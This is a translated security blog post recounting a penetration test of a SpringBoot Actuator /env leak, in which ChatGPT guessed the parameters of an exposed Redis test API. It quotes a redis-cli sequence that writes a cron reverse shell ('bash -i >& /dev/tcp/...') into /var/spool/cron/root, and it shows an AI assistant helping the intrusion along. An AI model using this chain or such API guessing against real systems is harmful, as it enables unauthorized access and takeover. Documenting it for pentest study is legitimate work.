Part1 Preface
Hello everyone, my name is ABC_123, and the official account has been officially renamed "Xitan Laboratory" . I drank a large glass of Qingdao's bulk beer tonight and was in a good mood. After I came back, I discussed with my brother about the use of Springboot's Actuator information leakage vulnerability. Although I didn't get the permission in the end, I still had some insights, so I have been working hard to record this real penetration test case and share it with everyone.
Usually when we do penetration testing or red team evaluation projects, we will encounter SpringBoot's Actuator information leakage vulnerability. We discovered the /actuator/env interface, but we suffered from the lack of a /refresh interface, no /heapdump file, and no /jolokia/list. , and there is no /httptrace port, etc. Next, we may have no solution and may choose to give up. However, /env will leak a lot of api interfaces and other sensitive information. When encountering an api interface, we may suffer from not knowing which one we need to contact. Which parameters are submitted by the API interface, or what unknown functions are implemented by the API interface ? ABC_123 today thought of using chatGPT to help us guess the unknown API interface implementation and submitted parameters, and achieved certain results!
It is recommended that everyone set the public account "Xitan Laboratory" as a star, otherwise you may not see it! Because official accounts can now display large image push only for frequently read and starred official accounts. How to operate: Click [...] in the upper right corner, and then click [Set as Star].
Part2 Technical Research Process
/env interface discovers APIs related to operating redis
By looking at the /actuator/env interface, I found an information leak of /api/public/test/redis/set": ["post":["tags":[Redis test operation"] . Next, my brother The master then thought about it, is it possible to use this interface to realize the use of redis rebound shell? This is a good idea, but the /actuator/env interface only provides the /redis/set function, and does not provide how to set the key value. So the first problem we have to solve is what is the interface for setting the key and what are the submitted parameters. We can only guess manually. At this time, we can use the powerful chatGPT to help us guess and give it a try .
Next is the performance moment of chatGPT
First, ABC_123 asked chatGPT the following question. The goal was to test chatGPT's understanding of this API interface. The results were found to be good. chatGPT perfectly explained the implementation function of this interface.
Next, I checked my notes and found that the usage statement of redis rebound shell is roughly as follows:
redis-cli -h 192.168.237.135
set x "\n* * * * * bash -i >& /dev/tcp/192.168.237.133/53 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
Save
From the above command, we know that if you want to obtain permissions through the redis rebound shell, you must first have the function of setting the key value . So ABC_123 asked the second question, asking chatGPT to help us guess the possible implementation method of the key value setting function of this API interface.
I sent it to my brother to test it, and found that submitting the data packet given by chatGPT with a POST request was successful! As shown in the figure below: After setting the key value, we successfully obtained the key value we set through /redis/get?key=dir, which shows that the statements given by chatGPT are accurate , and we have to lament the power of chatGPT.
At this point, I suddenly discovered that there is still a lack of a save function of redis to successfully utilize it.
Next, we asked chatGPT to help us guess the possible implementation method of the save function of the redis interface. Unfortunately, it was not successful.
So ABC_123 asked chatGPT to provide several other possible interface implementation methods to implement the save function. As shown in the figure below, chatGPT gives us 6 possible interface implementations.
Unfortunately, none of the several possible interfaces with save functions given by chatGPT were tested successfully.
Finally, we found that the operation interface of redis may not implement the save function of redis at all, but ABC_123 feels that this method is still good. Later, everyone encounters the situation where the /actuator/env interface or other API interfaces do not know how to submit parameters . Next, let chatGPT help you guess. ABC_123 feels that it will definitely be of great use in the future .
So in the end, chatGPT made another effort, and ABC_123 asked another question:
You can see that chatGPT refers to the /test/redis/get?key=dir function and guesses the implementation of many other API interface functions. We can test them one by one. It can be seen that chatGPT can help us save a lot of mental and physical energy.
Part3 Summary
1. Although the rebound shell by operating the redis api interface was not successful in the end, this idea ABC_123 feels worth practicing. At least we have discovered an available high-risk vulnerability . After all, it is fatal to obtain the permission to set, modify, and delete the redis database. .
2. In penetration testing or red team assessment projects, it seems that you still need to pay attention to the latest technology. Using your brain more will yield unexpected gains.
3. chatGPT has many other uses in our daily network security work. The follow-up article ABC_123 will specifically summarize and share it with you.
The public account focuses on sharing network security technology, including APT event analysis, red team attack and defense, blue team analysis, penetration testing, code audit, etc. One article per week, 99% original, so stay tuned.
Contact me: 0day123abc#gmail.com(replace # with @)